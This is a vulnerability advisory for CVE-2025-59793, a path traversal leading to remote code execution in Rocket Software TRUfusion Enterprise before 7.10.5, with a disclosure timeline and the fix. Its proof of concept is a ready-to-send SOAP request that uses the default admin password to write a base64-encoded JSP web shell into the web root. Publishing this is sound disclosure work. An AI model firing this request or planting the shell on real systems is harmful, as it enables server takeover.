Get in touch

Rocket Software TRUfusion Enterprise < 7.10.5 WsPortalV6UpDwAxis2Impl Path Traversal Remote Code Execution

Feb 16, 2026 · By Julien Ahrens

ADVISORY INFORMATION

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

TRUfusion Enterprise versions < 7.10.5

INTRODUCTION

TRUfusion Enterprise is a simple, cost-effective complementary solution for companies using CAD and PLM systems such as Siemens NX and Teamcenter®, PTC Creo and Windchill™, and Dassault Systemes CATIA, allowing you to easily and securely manage the exchange of CAD files and related product design data from within your PLM system.

(from the vendor’s homepage)

VULNERABILITY DETAILS

TRUfusion Enterprise is vulnerable to an authenticated path traversal in file upload path handling. The issue affects the uploadFile operation exposed by the /axis2/services/WsPortalV6UpDwAxis2Impl service, where the jobDirectory parameter is insufficiently validated and allows traversal outside the intended upload path, resulting in arbitrary file write. This can lead to remote code execution if attacker-controlled files are written to web-accessible or executable locations. Exploitation risk is increased by deployments that retain the default admin password trubiquity. In some affected versions, the vulnerable Axis2 endpoint is bound to localhost, but that restriction can be bypassed by chaining with CVE-2025-32355 to reach internal-only services.

PROOF OF CONCEPT

POST /axis2/services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
SOAPAction: urn:uploadFile
Content-Type: text/xml
Content-Length: 1531

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
   <soapenv:Header/>
   <soapenv:Body>
      <updw:uploadFile>
         <!--type: string-->
         <updw:login>admin</updw:login>
         <!--type: string-->
         <updw:password>trubiquity</updw:password>
         <!--type: string-->
         <updw:archiveName>shell.jsp</updw:archiveName>
         <!--type: string-->
         <updw:jobNumberSend></updw:jobNumberSend>
         <!--type: string-->
        <updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
         <!--type: base64Binary-->
         <updw:dataHandler>PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+CjwlClN0cmluZyBjYWQgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIik7ClN0cmluZyBvdXRwdXQgPSAiIjsKaWYgKGNhZCAhPSBudWxsKSB7ClN0cmluZyBzID0gbnVsbDsKdHJ5IHsKUnVudGltZSBydCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpOwpQcm9jZXNzIHJlcyA9IHJ0LmV4ZWMobmV3IFN0cmluZ1tdeyIvYmluL3NoIiwgIi1jIiwgY2FkfSk7CkJ1ZmZlcmVkUmVhZGVyIHNJID0gbmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihyZXMuZ2V0SW5wdXRTdHJlYW0oKSkpOwpTdHJpbmdCdWlsZGVyIHNiID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKd2hpbGUgKChzID0gc0kucmVhZExpbmUoKSkgIT0gbnVsbCkgewpzYi5hcHBlbmQocykuYXBwZW5kKCJcbiIpOwp9Cm91dHB1dCA9IHNiLnRvU3RyaW5nKCk7Cn0gY2F0Y2ggKElPRXhjZXB0aW9uIGUpIHsKZS5wcmludFN0YWNrVHJhY2UoKTsKfQp9CiU+CjxwcmU+CjwlPSBvdXRwdXQgJT4KPC9wcmU+</updw:dataHandler>
      </updw:uploadFile>
   </soapenv:Body>
</soapenv:Envelope>

SOLUTION

Update to TRUfusion Enterprise 7.10.5

REPORT TIMELINE

  • 2025-09-20: Discovery of the vulnerability
  • 2025-09-22: CVE-2025-59793 assigned by MITRE
  • 2025-09-25: Vendor contacted via established disclosure channel
  • 2025-11-12: No vendor response; requested update
  • 2025-11-12: Vendor confirmed ongoing investigation
  • 2026-01-01: Happy new year!
  • 2026-02-09: Vendor notified of upcoming disclosure
  • 2026-02-09: Vendor stated that the issue had been resolved
  • 2026-02-09: Clarification requested regarding affected and fixed versions
  • 2026-02-11: Vendor confirmed fix included in TRUfusion Enterprise 7.10.5
  • 2026-02-16: Public Disclosure

REFERENCES